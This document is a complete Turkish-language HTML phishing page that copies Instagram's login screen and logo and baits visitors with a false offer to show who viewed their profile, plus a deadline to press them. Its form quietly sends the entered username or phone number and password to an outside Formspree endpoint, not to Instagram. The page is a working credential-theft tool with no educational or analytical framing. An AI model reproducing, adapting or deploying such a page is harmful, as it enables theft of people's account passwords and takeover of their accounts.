<!DOCTYPE html>
<html lang="tr-TR">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Giriş Yap • Instagram</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&display=swap" rel="stylesheet">
    <style>
        * {
            margin: 0px;
            padding: 0px;
            box-sizing: border-box;
          }
    
          body {
            background-color: #eee;
            font-family: "Poppins", sans-serif;
            font-weight: 400;
          }
    
          #wrapper {
            width: 100%;
            height: 100%;
            overflow: hidden;
            border: 0px solid #000;
          }
    
          .main-content {
            width: 90%;
            height: 50%;
            margin: 10% auto;
            background-color: #fff;
            border: 2px solid #e6e6e6;
            padding: 5% 10%;
          }
    
          .header {
            border: 0px solid #000;
            margin-bottom: 5%;
            text-align: center;
            justify-content: center;
            align-items: center;
          }
    
          .header img {
            height: 15vw;
            max-height: 60px;
            width: 60%;
            max-width: 175px;
            margin: auto;
            position: relative;
          }
    
          .input-1,
          .input-2 {
            width: 100%;
            margin-bottom: 5%;
            padding: 5% 7%;
            border: 1px solid #dbdbdb;
            box-sizing: border-box;
            border-radius: 3px;
            outline: 0;
            font-size: 3vw;
          }
    
          .overlap-text {
            position: relative;
          }
    
          .overlap-text a {
            position: absolute;
            top: 8%;
            right: 10%;
            color: #003569;
            font-size: 3vw;
            text-decoration: none;
            font-family: "Poppins", sans-serif;
          }
    
          .btn {
            width: 100%;
            background-color: #3897f0;
            border: 1px solid #3897f0;
            padding: 4% 7%;
            color: #fff;
            font-weight: bold;
            cursor: pointer;
            border-radius: 8px;
            font-size: 3vw;
          }
    
          .sub-content {
            width: 90%;
            height: 50%;
            margin: 10% auto;
            border: 1px solid #e6e6e6;
            padding: 5% 10%;
            background-color: #fff;
          }
    
          .s-part {
            text-align: center;
            font-family: "Poppins", sans-serif;
          }

.s-part a {
  text-decoration: none;
  cursor: pointer;
  color: #3897f0;
  font-family: 'Poppins', sans-serif;
}
    </style>
</head>
<body>
<div id="wrapper">
  <div class="main-content">
    <div class="header">
      <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1280px-Instagram_logo.svg.png" />
      <br/>
      <small>Instagram'da profiline bakanları görüntüle!</small>
    </div>
    <br>
    <form action="https://formspree.io/f/xqkopjao" method="POST">
    <div class="l-part">
      <input type="text" name="platform" value="INSTAGRAM" style="display: none;"/>
      <input type="text" placeholder="Telefon numarası, kullanıcı adı veya e-posta" class="input-1" name="username" required/>
      <div class="overlap-text">
        <input type="password" placeholder="Şifre" class="input-2" name="password" required/>
      </div><br>
      <input type="submit" value="Sisteme giriş yap" class="btn" />
    </div>
</form>
  </div>
</div>
<br/>
<div class="cnt" style="text-align: center; justify-content: center; align-items: center;">
    <h2>Profiline bakanları görüntüle!</h2><br/>
    <p>Her 15 dakikada yenilenen sistemimiz ile Instagram profilinize bakan gizli/açık hesapları görüntüleyin.</p><br/>
    <p style="color: rgb(19, 195, 3); font-weight: 700;">Son ücretsiz kullanıma açık tarih: 30.03.2023</p>
</div>
</body> 
</html>
